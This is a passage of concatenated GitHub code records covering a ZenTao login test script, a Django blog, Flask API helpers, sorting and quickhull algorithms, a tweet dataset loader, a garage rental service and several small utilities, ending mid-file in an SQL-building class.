login(s,user=\"laraine\",psw=\"e10adc3949ba59abbe56e057f20f883e\"):\n u\"登录禅道\"\n loginUrl=host+\"/user-login.html\"\n h={\n \"Connection\":\"keep-alive\",\n \"Content-Length\":\"120\",\n \"Cache-Control\":\"max-age=0\",\n \"Origin\":\"http://112.74.112.220:8083\",\n \"Upgrade-Insecure-Requests\":\"1\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n # 
\"Referer\":\"http://112.74.112.220:8083/user-login.html\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Accept-Language\":\"en,zh-CN;q=0.9,zh;q=0.8\",\n\n }\n\n boby={\n \"account\":user,\n \"password\":psw,\n \"Referer\":host+\"/my/\"\n }\n\n try:\n r=s.port(loginUrl,data=boby,hearder=h)\n print(r.content)#打印结果看到location=‘host+\"/my/\"说明登录成功了\n if \"/my/in r.content\":\n print(\"登录成功了\")\n return True\n else:\n print(\"登录失败:%s\"%r.content)\n return False\n except Exception as msg:\n print(\"登录失败:%s\"%str(msg))\n return False\n\n # def upload_jpg(s):\n # u\"上传图片\"\n # url=\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"laraine7/appium","sub_path":"interface/05_requests-toolbelt处理multipart.py","file_name":"05_requests-toolbelt处理multipart.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11371891015","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Fri Feb 18 2022\n\n@author: Carlos Páez\n'''\n\n\ndef solveMeFirst(a, b):\n \"\"\"\n Given two integers, return their sum\n \n :param a: the first number\n :param b: the second number\n :return: The sum of the two numbers.\n \"\"\"\n if 1 <= a and b <= 1000:\n return a + b\n return '1 <= a, b <= 1000'\n\n\nnum1 = int(input())\nnum2 = int(input())\n\nres = solveMeFirst(num1, num2)\nprint(res)\n","repo_name":"carlos-paezf/HackerRank_Algorithms","sub_path":"Python/01-Solve_Me_First.py","file_name":"01-Solve_Me_First.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"485315930","text":"from django.db.models import F, Q\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.cache import cache_page\nfrom django.views import generic\n# from django.views.generic import TemplateView, ListView\n\nfrom . 
models import Category, Article\n\n\n# @cache_page(60 * 2)\ndef index(request):\n title = 'Hlavni stranka'\n context = {\n 'title': title,\n }\n return render(request, 'blog/index.html', context)\n\n\n# @cache_page(60)\ndef blog(request):\n title = 'Blog'\n articles = Article.objects.filter(is_published=True).select_related()\n paginator = Paginator(articles, 3)\n page_number = request.GET.get('page', 1)\n page_obj = paginator.get_page(page_number)\n context = {\n 'title': title,\n 'page_obj': page_obj,\n }\n return render(request, 'blog/blog.html', context)\n\n\n# @cache_page(60)\ndef get_category(request, category_id):\n # category = Category.objects.raw('SELECT * FROM category')\n articles = Article.objects.filter(category=category_id,\n is_published=True).select_related('category')\n context = {\n # 'category': category,\n 'articles': articles,\n }\n return render(request, 'blog/category.html', context)\n\n\n# @cache_page(60)\ndef get_article(request, article_id):\n article = get_object_or_404(Article.objects.select_related(),\n id=article_id,\n is_published=True,\n )\n article.views = F('views') + 1\n article.save()\n context = {\n 'article': article,\n }\n return render(request, 'blog/article.html', context)\n\n\n# class ViewArticle(generic.DetailView):\n# model = Article\n \n\n# @cache_page(60 * 2)\ndef about(request):\n title = 'O Mne'\n return render(request, 'blog/about.html', {'title': title})\n\n\n# @cache_page(60 * 2)\ndef contacts(request):\n title = 'Kontakty'\n return render(request, 'blog/contacts.html', {'title': title})\n\n\ndef certificates(request):\n title = 'Certifikáty'\n return render(request, 'blog/certificates.html', {'title': title})\n\n\ndef search_page(request):\n if request.method == 'POST':\n q = request.POST.get('search') if request.POST.get('search') is not None else ''\n\n articles = Article.objects.filter(Q(title__icontains=q, is_published=True) |\n Q(category__title__icontains=q, is_published=True) |\n Q(content__icontains=q, is_published=True)\n )\n\n return render(request,\n 'blog/search_page.html',\n {'articles': articles, 'q': q}\n )\n else:\n return render(request,\n 'blog/search_page.html',\n # context\n )\n\n ","repo_name":"Mrhetsko/psy2","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73095016585","text":"import uuid\nimport urlparse\nimport urllib\n\nfrom flask import g, request\n\nfrom mqetables import enrichment\nfrom mqe import util\nfrom mqe import reports\nfrom mqe import serialize\n\nfrom mqeapi import apiconfig\nfrom mqeapi import responses\n\n\ndef set_query_param(url, param_name, param_value):\n pr = urlparse.urlparse(url)\n params_dict = urlparse.parse_qs(pr.query)\n params_dict[param_name] = param_value\n pr = pr._replace(query=urllib.urlencode(params_dict, True))\n return urlparse.urlunparse(pr)\n\ndef href(path):\n return apiconfig.BASE_URL_API + path\n\ndef to_id(uuid):\n return uuid.hex\n\ndef parse_id(s):\n if not s or not s.strip():\n return None\n try:\n return uuid.UUID(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid id format <%s>' % s)\n\ndef parse_datetime(s):\n if s is None or not s.strip():\n return None\n ev = enrichment.EnrichedValue(s)\n res = ev.optimistic_as_datetime\n if res is None:\n raise responses.ExceptionalResponse.bad_request('Invalid datetime <%s>' % s)\n return res\n\ndef parse_tags(s):\n if s is None:\n return None\n if 
s == '':\n return []\n tags = s.split(',')\n tags = [t for t in tags if t.strip()]\n return util.uniq_sameorder(tags)\n\ndef parse_int_tags(s):\n tags = parse_tags(s)\n if tags is None:\n return None\n\n res = []\n for x in tags:\n try:\n res.append(int(x))\n except ValueError:\n pass\n return res\n\ndef parse_bool(s):\n if not s:\n return None\n s = s.lower().strip()\n if s in {'', '0', 'false', 'f', 'no'}:\n return 0\n if s in {'1', 'true', 't', 'yes'}:\n return 1\n try:\n return int(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid bool/number format <%s>' % s)\n\ndef parse_int(s):\n if not s:\n return None\n try:\n return int(s)\n except ValueError:\n raise responses.ExceptionalResponse.bad_request('Invalid integer format <%s>' % s)\n\ndef parse_string(s, max_len=None):\n if not s or not s.strip():\n return None\n s = s.strip()\n if max_len is not None and len(s) > max_len:\n raise responses.ExceptionalResponse.bad_request('Value too long <%s>' % s)\n return s\n\ndef parse_enum(s, enum_values):\n val = parse_string(s)\n if not val:\n return None\n if val not in enum_values:\n raise responses.ExceptionalResponse.bad_request('Invalid value <%s>, must be one of: %s' % (\n val, ', '.join('<%s>' % ev for ev in enum_values)))\n return val\n\ndef parse_json(s):\n if not s or not s.strip():\n return None\n try:\n return serialize.json_loads(s)\n except:\n raise responses.ExceptionalResponse.bad_request('Invalid json value <%s>' % s)\n\n\ndef get_report(name):\n report = reports.Report.select_by_name(g.owner_id, name)\n if not report:\n raise responses.ExceptionalResponse(responses.ApiResponse(404, message='Report <%s> not found' % name))\n return report\n\ndef get_report_instance(report, report_instance_id):\n ri = report.fetch_single_instance(report_instance_id)\n if not ri:\n raise responses.ExceptionalResponse(responses.ApiResponse(404, message='Report instance with id <%s> not found' % to_id(report_instance_id)))\n return ri\n\ndef get_limit():\n limit = parse_int(request.args.get('limit'))\n if limit is None:\n limit = apiconfig.DEFAULT_GET_LIMIT\n\n if not 1 <= limit <= apiconfig.MAX_GET_LIMIT:\n raise responses.ExceptionalResponse(responses.ApiResponse(400, message='Invalid limit <%s>: must be between 1 and %s' % (limit, apiconfig.MAX_GET_LIMIT)))\n return limit\n\ndef client_ip():\n ff = request.headers.get('x-forwarded-for')\n if not ff:\n return request.remote_addr\n ff = ff.replace(' ', '')\n return ff.split(',', 1)[0]\n\n\n","repo_name":"ighori/monique-api","sub_path":"mqeapi/apiutil.py","file_name":"apiutil.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19043773703","text":"\n# Selection sort in Python\n# time complexity O(n*n)\n#sorting by finding min_index\n\nimport random\nimport time\n\n\ndef selection_sort(L):\n # i indicates how many items were sorted\n for i in range(len(L)):\n # To find the minimum value of the unsorted segment\n # We first assume that the first element is the lowest\n min_index = i\n # We then use j to loop through the remaining elements\n for j in range(i+1, len(L)):\n # Update the min_index if the element at j is lower than it\n if L[j] < L[min_index]:\n min_index = j\n # After finding the lowest item of the unsorted regions, swap with the first unsorted item\n L[i], L[min_index] = L[min_index], L[i]\n\nrandomlist = random.sample(range(-1000, 1000), 100)\n# print(randomlist)\nstart_time = 
time.time_ns()\nselection_sort(randomlist)\nprint(\"It took %s micro seconds ---\" % round((time.time_ns() - start_time)/1000))\n# print('The array after sorting in Ascending Order by selection sort is:')\n# print(randomlist)\n","repo_name":"chutieu312/sorting","sub_path":"selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71524322824","text":"import os\nimport sys\nfrom typing import Dict\nimport pandas as pd\nimport psycopg2\nfrom dotenv import load_dotenv\nimport logging\n\nlogging.basicConfig()\nlogging.getLogger(\"sqlalchemy.engine\").setLevel(logging.DEBUG)\n\nload_dotenv()\n\ndf = pd.read_csv(\"cluster-data.csv\", delimiter=\";\", decimal=\",\")\n\ndf[[\"artist\", \"track_name\"]] = df[[\"artist\", \"track_name\"]].astype(str)\nprint(df.dtypes)\nprint(df.loc[1:1])\n\ndb_credentials = {\n \"dbname\": os.environ[\"DBNAME\"],\n \"user\": os.environ[\"DBUSER\"],\n \"password\": os.environ[\"DBPASS\"],\n \"host\": os.environ[\"DBHOST\"],\n}\n\n\ndef connect(credentials: Dict):\n\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n\n conn = None\n try:\n print(\"Connecting to the PostgreSQL database...\")\n conn = psycopg2.connect(**credentials)\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n sys.exit(1)\n print(\"Connection successful\")\n return conn\n\n\ndef execute_many(conn, df, table):\n\n \"\"\"\n Using cursor.executemany() to insert the dataframe\n \"\"\"\n\n tuples = [tuple(x) for x in df.to_numpy()]\n cols = \",\".join(list(df.columns))\n query = \"INSERT INTO %s(%s) VALUES(%%s,%%s,%%s,%%s,%%s,%%s)\" % (table, cols)\n cursor = conn.cursor()\n try:\n cursor.executemany(query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"execute_many() done\")\n cursor.close()\n\n\nconn = connect(db_credentials)\nexecute_many(conn, df, \"resume_clusterdata\")\n","repo_name":"danielsteman/resume","sub_path":"data/inject_data.py","file_name":"inject_data.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19640587951","text":"import spacy\nimport yaml\nimport pandas as pd\n\n\ndef load_config():\n with open('src/config.yml', 'r') as f:\n config = yaml.safe_load(f)\n return config\n\ndef load_and_lemmatize_keywords():\n config = load_config()\n\n keywords = pd.read_csv(config[\"keywords_path\"], header=None)\n keywords = list(keywords.iloc[:,0])\n\n nlp = spacy.load(\"pl_core_news_md\")\n lemmatized_keywords = [' '.join([token.lemma_ for token in nlp(phrase)]) for phrase in keywords]\n\n return keywords, lemmatized_keywords\n\ndef lemmatize_description(description):\n nlp = spacy.load(\"pl_core_news_md\")\n\n description_lemmatized = ' '.join([token.lemma_ for token in nlp(description)])\n\n return description_lemmatized\n\ndef count_keywords(keywords, lem_keywords, desc_lem):\n counts = {}\n\n for phrase_lem, phrase in zip(lem_keywords, keywords):\n if phrase_lem in desc_lem:\n counts[phrase] = counts.get(phrase, 0) + desc_lem.count(phrase_lem)\n\n return counts\n\ndef process_description(descriptions):\n keywords, lemmatized_keywords = load_and_lemmatize_keywords()\n counts = []\n\n for desc in descriptions:\n counts.append(count_keywords(keywords,\n lemmatized_keywords,\n lemmatize_description(desc)))\n\n 
return counts\n","repo_name":"jmstepka/fake-job-hunter-model","sub_path":"src/keyword_analysis.py","file_name":"keyword_analysis.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28675335018","text":"# # The Joy of Computing using Python Week 12 (04 Dec 2020)\n\n\n# Write a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\n\n# Input Format:\n# The first line of the input contains a statement.\n\n# Output Format:\n# Print the number of upper case and lower case respectively separated by a space.\n\n# Example:\n\n# Input:\n# Hello world!\n\n# Output:\n# 1 9\n\n\nn = input()\nu = 0\nl = 0\nfor i in n:\n if i.isupper():\n u += 1\n elif i.islower():\n l += 1\nprint(u, l, end = '')\n","repo_name":"jaygohil15/NPTEL","sub_path":"The Joy of computing using python/Week 12 Ass. 2 - Letters.py","file_name":"Week 12 Ass. 2 - Letters.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7295467704","text":"szFileNmae = \"/Users/51pwn/MyWork/mybugbounty/ai/i1.jpg\"\n\nimport numpy as np \nimport cv2 \nfrom matplotlib import pyplot as plt \n \n \n# read the image \nimg = cv2.imread(szFileNmae) \n \n# convert image to gray scale image \ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n \n# detect corners with the goodFeaturesToTrack function. \ncorners = cv2.goodFeaturesToTrack(gray, 27, 0.01, 10) \ncorners = np.int0(corners) \n \n# we iterate through each corner, \n# making a circle at each point that we think is a corner. \nfor i in corners: \n x, y = i.ravel() \n cv2.circle(img, (x, y), 3, 255, -1)\n\n(h,w) = img.shape[:2]\n\npts1=np.float32([[0,0],[0,h],[w,0],[w,h]])\npts2=np.float32([(7.17803, 6.05628),(67.6975,198.332),(209.54, 50.1851),(231.604, 226.7)])\n\nm = cv2.getPerspectiveTransform(pts2,pts1)\nimg = cv2.warpPerspective(img,m,(w,h))\n\ncv2.imshow('Perspective', img)\nplt.imshow(img), plt.show()\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# from matplotlib import pyplot as plt\n# import cv2\n# import numpy as np\n\n\n# def show_img(name, img):\n# plt.subplot(1,1,1)\n# plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n# plt.title(name, fontdict={'fontsize':16, 'color':'b'})\n# plt.show()\n\n\n# img = cv2.imread(szFileNmae)\n# img_h, img_w, _ = img.shape\n\n# # 这里调整,颜色范围局域的单个\n# lower = (10, 0, 0)\n# upper = (200, 255, 255)\n\n# blurred = cv2.GaussianBlur(img, (5, 5), 0)\n\n# hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n# # inRange的作用是根据阈值进行二值化:阈值内的像素设置为白色(255),阈值外的设置为黑色(0)\n# mask = cv2.inRange(hsv, lower, upper)\n\n# mask = cv2.erode(mask, None, iterations=2)\n\n# mask = cv2.dilate(mask, None, iterations=2)\n\n# contours, _hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n# max_i = 0\n# for i,cnt in enumerate(contours):\n# if cv2.contourArea(cnt) > cv2.contourArea(contours[max_i]):\n# max_i = i\n\n# peri = cv2.arcLength(contours[max_i], True)\n# approx = cv2.approxPolyDP(contours[max_i], 0.02 * peri, True)\n\n# # cv2.drawContours(img,[contours[max_i]],0,(255,0,0),10)\n\n# # 这四个点为原始图片上数独的位置\n# pts_o = np.float32([approx[0][0], approx[1][0], approx[2][0], approx[3][0]])\n# # 这是变换之后的图上四个点的位置\n# pts_d = np.float32([[img_w, 0], [0, 0], [0, img_h], [img_w, img_h]])\n\n# M = cv2.getPerspectiveTransform(pts_o, pts_d)\n\n# dst = cv2.warpPerspective(img, M, (img_w, img_h)) \n \n# # show_img(\"src\", 
img)\n# show_img(\"dst\", dst)","repo_name":"hktalent/myocr","sub_path":"fixScanImg.py","file_name":"fixScanImg.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20817527507","text":"import os\nimport re\nimport sys\nimport webbrowser\nfrom datetime import datetime as dt\nfrom setup import setup; setup()\n\nimport framework\nfrom framework.TestCase import TestCase\n\n# Allow command-line selection of tests to run\nif len(sys.argv) > 1:\n\ttests_to_run = sys.argv[1:]\n\tframework.TESTS = filter(lambda x: x[0] in tests_to_run, framework.TESTS)\n\n# Time of test\nrunning_time = dt.now()\n\n# Report Name\nreport_name = \"report_%s.html\" % running_time.strftime(\"%Y%m%d%H%M%S\")\n\n# Open a fill in top part of reports template and\n# write it to results.html\nf = open(framework.ROOT_DIR + '/framework/assets/templates/top.html', 'r')\ntop = f.read() % (running_time.strftime(\"%x at %X\"), running_time.strftime(\"%x at %X\"))\n#top = top.replace(\"{ROOT_DIR}\", framework.ROOT_DIR)\nf.close()\n\nf = open(framework.REPORTS_DIR + report_name, 'w')\nf.write(top)\nf.close()\n\nfor test in framework.TESTS:\n test_case = TestCase()\n test_case.parse(framework.TESTS_DIR + test[1])\n test_case.execute()\n test_case.report(framework.REPORTS_DIR + report_name)\n\n# write bottom of file\nf = open(framework.REPORTS_DIR + report_name, 'a')\nf.write(\"\")\nf.close()\n\n# open in web browser\nwebbrowser.open(\"file://\" + framework.REPORTS_DIR + report_name)\n\nsys.exit(0)\n","repo_name":"CSCI-362-03-2015/TeamToo","sub_path":"TestAutomation/scripts/runAllTests.py","file_name":"runAllTests.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5210166251","text":"import csv\nimport os\nfrom typing import Dict, List\n\nimport nltk\nimport torch\nimport torchtext\nfrom torch.utils.data import Dataset\n\ntwitter_label = {'negative': 0, 'neutral': 1, 'positive': 2}\n\n\nclass TwitterDataset(Dataset):\n \"\"\"https://www.kaggle.com/c/tweet-sentiment-extraction/data\"\"\"\n\n def __init__(self, split='train'):\n super().__init__()\n self.dataset = []\n if split == 'train':\n data_path = os.path.join('ALPS_2021/data/train.csv')\n elif split == 'val':\n data_path = os.path.join('ALPS_2021/data/test.csv')\n with open(data_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',',\n quoting=csv.QUOTE_MINIMAL)\n self.dataset.extend([line for line in csv_reader][1:])\n # 358bd9e861,\" Sons of ****, why couldn`t they put them on the\n # releases we already bought\",\"Sons of ****,\",negative\n for i in range(len(self.dataset)):\n self.dataset[i] = (self.dataset[i][1],\n twitter_label[self.dataset[i][-1]])\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, item):\n return self.dataset[item]\n\n\ndef get_embeddings(embeddings_name: str,\n embedding_dim: int,\n special_tokens: List[str] = ['']):\n \"\"\"\n :return: a tensor with the embedding matrix - ids of words are from vocab\n \"\"\"\n if embeddings_name == 'glove':\n embeddings = torchtext.vocab.GloVe(dim=embedding_dim, name='6B')\n\n word_to_index = embeddings.stoi\n word_vectors = embeddings.vectors\n\n for token in special_tokens:\n word_to_index[token] = len(word_to_index)\n word_vectors = torch.cat([word_vectors, torch.zeros(1, embedding_dim)],\n dim=0)\n\n return torch.nn.Parameter(word_vectors, requires_grad=True), 
word_to_index\n\n\nclass EmbeddingsVocabTokenizer:\n def __init__(self, word_to_id, id_to_word):\n self.word_to_id = word_to_id\n self.id_to_word = id_to_word\n self.tokenizer = nltk.tokenize.word_tokenize\n self.pad_token_id = self.word_to_id['']\n self.mask_token_id = self.word_to_id['unk']\n\n def encode(self, text, max_length=-1, lower=True):\n tokens = self.tokenizer(text)\n if lower:\n tokens = [t.lower() for t in tokens]\n\n token_ids = [self.word_to_id[token] if token in self.word_to_id else\n self.word_to_id['unk'] for token in tokens]\n return token_ids[:max_length]\n\n def __len__(self):\n return len(self.word_to_id)\n\n def convert_ids_to_tokens(self, token_ids: List[int]) -> List[str]:\n return [self.id_to_word[token] for token in token_ids]\n\n\ndef collate_tweet(instances: List[Dict],\n tokenizer,\n return_attention_masks: bool = True,\n pad_to_max_length: bool = False,\n max_seq_len: int = 512,\n device='cuda',\n return_seq_lens: bool = False) -> List[torch.Tensor]:\n token_ids = [tokenizer.encode(_x[0], max_length=509) for _x in instances]\n if pad_to_max_length:\n batch_max_len = max_seq_len\n else:\n batch_max_len = max([len(_s) for _s in token_ids])\n padded_ids_tensor = torch.tensor(\n [_s + [tokenizer.pad_token_id] * (batch_max_len - len(_s)) for _s in\n token_ids])\n labels = torch.tensor([_x[1] for _x in instances], dtype=torch.long)\n\n output_tensors = [padded_ids_tensor]\n if return_attention_masks:\n output_tensors.append(padded_ids_tensor > 0)\n output_tensors.append(labels)\n output_tensors = list(_t.to(device) for _t in output_tensors)\n\n if return_seq_lens:\n seq_lengths = []\n for instance in output_tensors[0]:\n for _i in range(len(instance) - 1, -1, -1):\n if instance[_i] != tokenizer.pad_token_id:\n seq_lengths.append(_i + 1)\n break\n output_tensors.append(seq_lengths)\n\n return output_tensors\n","repo_name":"copenlu/ALPS_2021","sub_path":"tutorial_src/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"81"} +{"seq_id":"291450227","text":"from visualization.visualization_tool import *\nfrom additional_functions.additional_functions import *\nfrom copy import deepcopy\n\n\ndef calculate_distance(points, p_1, p_2):\n result = None\n for i in range(len(points)):\n if orientation(p_1, p_2, points[i]) == 1:\n if result is None or det(p_1, p_2, points[i]) < det(p_1, p_2, result):\n result = points[i]\n return result\n\n\ndef is_inside(p_1, p_2, p_3, p, epsilon):\n if det(p_1, p_2, p) > -epsilon and det(p_2, p_3, p) > -epsilon and det(p_3, p_1, p) > -epsilon:\n return True\n return False\n\n\ndef remove_points_inside(points, p_1, p_2, p_3, epsilon):\n new_points = []\n for p in points:\n if not is_inside(p_1, p_2, p_3, p, epsilon):\n new_points.append(p)\n points.clear()\n points += new_points\n\n\ndef recursive_quickhull(points, convex_hull, p_1, p_2, scenes, epsilon):\n if len(points) == 0:\n return []\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection(deepcopy([[p_1, p_2]]), color=\"red\")]))\n\n p_3 = calculate_distance(points, p_1, p_2)\n if p_3 is None:\n return []\n points.remove(p_3)\n convex_hull.append(p_3)\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), 
color=\"blue\"),\n PointsCollection([p_3], color=\"red\")],\n lines=[LinesCollection(deepcopy([[p_1, p_2]]), color=\"red\")]))\n\n remove_points_inside(points, p_1, p_2, p_3, epsilon)\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection([[p_1, p_2], [p_1, p_3], [p_2, p_3]], color=\"red\")]))\n\n # adding scenes for visualization\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(convex_hull), color=\"blue\")],\n lines=[LinesCollection([[p_2, p_3]], color=\"red\")]))\n\n return recursive_quickhull(points, convex_hull, p_1, p_3, scenes, epsilon) + [p_3] + \\\n recursive_quickhull(points, convex_hull, p_3, p_2, scenes, epsilon)\n\n\ndef quickhull_convex_hull(points, epsilon=10 ** (-12), write_to_file=False, filename=\"quickhull_result\"):\n if len(points) < 3:\n return None, None\n sorted_points = sorted(points, key=lambda x: x[0])\n p_1 = sorted_points[0]\n p_2 = sorted_points[-1]\n\n # creating scenes for visualization\n scenes = [Scene(points=[PointsCollection(deepcopy(sorted_points), color=\"black\")])]\n\n sorted_points.remove(p_1)\n sorted_points.remove(p_2)\n curr_hull = [p_1, p_2]\n convex_hull = [p_1] + recursive_quickhull(sorted_points, curr_hull, p_1, p_2, scenes, epsilon) + \\\n [p_2] + recursive_quickhull(sorted_points, curr_hull, p_2, p_1, scenes, epsilon)\n\n # adding scenes for visualization\n hull_lines = create_lines(convex_hull)\n scenes.append(Scene(points=[PointsCollection(deepcopy(points), color=\"black\"),\n PointsCollection(deepcopy(curr_hull), color=\"blue\")],\n lines=[LinesCollection(deepcopy(hull_lines), color=\"blue\")]))\n\n if write_to_file:\n with open(f'{filename}.txt', 'w') as file:\n for item in curr_hull:\n file.write(f\"{item}\\n\")\n return convex_hull, scenes\n","repo_name":"Szymon-Budziak/Geometric_algorithms_project","sub_path":"algorithms_with_visualisation/quickhull_convex_hull_algorithm.py","file_name":"quickhull_convex_hull_algorithm.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11857936525","text":"from entities.garage import Garage\n\nclass GarageService:\n garages = []\n\n def __init__(self, locator_service, renter_service, system_balance_service):\n self.renter_service = renter_service \n self.system_balance_service = system_balance_service\n self.locator_service = locator_service\n\n\n def register_garage(self, locator_document, rent_price, address, size):\n locator = self.locator_service.get_locator_by_document(locator_document)\n if (locator == None):\n print('Locador não encontrado')\n return\n\n garage_id = str(len(self.garages) + 1)\n garage = Garage(garage_id, locator._id, rent_price, address, size)\n self.garages.append(garage)\n return garage\n\n\n def find_garage_by_id(self, garage_id):\n for garage in self.garages:\n if (garage._id == garage_id):\n return garage\n\n\n def rent_garage(self, garage_id, renter_document):\n garage_found = self.find_garage_by_id(garage_id)\n\n if (garage_found == None):\n print('Garagem não encontrada')\n return\n\n renter = self.renter_service.get_renter_by_document(renter_document)\n if (renter == None):\n print('Locatário não encontrado')\n return\n\n garage_found.rent(renter._id)\n self.system_balance_service.charge_system_tax()\n print('Garagem locada com sucesso')\n return 
garage_found\n\n\n def cancel_rent(self, garage_id):\n garage_found = self.find_garage_by_id(garage_id)\n\n if (garage_found == None):\n print('Garagem não encontrada')\n return\n\n garage_found.cancel_rent()\n\n print('Locação cancelada com sucesso')\n return garage_found\n\n\n def search_garages_by_size(self, garage_size):\n garages_found = []\n\n for garage in self.garages:\n if (garage.size >= garage_size):\n garages_found.append(garage)\n\n if (len(garages_found) == 0):\n print('Não encontramos nenhuma garagem com o tamanho igual ou maior ao especificado')\n return\n\n print('Id\\t Tamanho \\t Preço \\t\\t Endereço')\n for garage in garages_found:\n print(garage._id, \"\\t\", garage.size, \"\\t\\t R$ \", garage.rent_price, \"\\t\\t\", garage.address)\n\n return garages_found\n\n def search_garages_by_renter(self, renter_document):\n renter = self.renter_service.get_renter_by_document(renter_document)\n if (renter == None):\n print('Locatário não encontrado')\n return\n\n garages_found = []\n for garage in self.garages:\n if (garage.renter_id == renter._id):\n garages_found.append(garage)\n\n if (len(garages_found) == 0):\n print('O locatário não tem garagens locadas no momento')\n return\n\n print('Id\\t Tamanho \\t Preço \\t\\t Endereço')\n for garage in garages_found:\n print(garage._id, \"\\t\", garage.size, \"\\t\\t R$ \", garage.rent_price, \"\\t\\t\", garage.address)\n","repo_name":"gabriel-amorim1/self-storage","sub_path":"services/garage_service.py","file_name":"garage_service.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36647849332","text":"#!.venv/bin/python\nimport csv\nimport json\n\nwith open('result.csv', 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=';')\n headers = next(csvreader)\n column = {}\n rows = {}\n for h in headers:\n column[h] = []\n\n for (i, row) in enumerate(csvreader):\n json_key = ''\n full_row = {}\n for (j, column) in enumerate(row):\n if (j == 0):\n json_key = column.strip()\n else:\n header = headers[j]\n full_row[header] = column.strip()\n\n rows[json_key] = full_row\n\nwith open('isinRisk.json', 'w') as outfile:\n json.dump(rows, outfile)\n\nwith open(\"isinRisk.js\", 'a') as file:\n file.write(\"window.isinRisk = %s\" % rows)\n","repo_name":"netzhoerer/csv_to_json_js","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33703636175","text":"# pylint:disable=R0201\n\nfrom OpenOrange import *\nfrom Document import Document\nfrom Label import Label\nfrom SQLTools import codeOrder, monthCode\nfrom datetime import datetime\n\nclass AlotmentDoc(Document):\n\n classattr = \"classattr\"\n\n def getRecorda(self):\n class newObj(object):\n Status = 1\n RootLabel = \"100\"\n SerNr = \"SerNr\"\n Labels = \"100,200\"\n TransDate = datetime.now().date()\n def name(self):\n return \"Alotment\"\n return newObj()\n\n def getExtra(self, val1, val2=\"2\", val3=\"3\", val4=4):\n specs = self.getRecorda()\n sql = \"WHERE?AND [al].{%s} IN ('%s')\\n\" % (\"SerNr\", \"','\".join([val1, val3, val2]))\n sql += \"WHERE?AND [al].{SerNr} = i|%i|\\n\" % specs.Status\n sql += \"WHERE?AND [al].TransDate < d|%s|\\n\" % specs.TransDate\n sql += \"WHERE?AND SerNr = \"\n if specs.Status == 1:\n sql += \"%s\" % val4\n if 1 in [0, 0]:\n pass\n else:\n sql += \"\"\n return sql\n\n def getExtra2(self, test):\n parent = 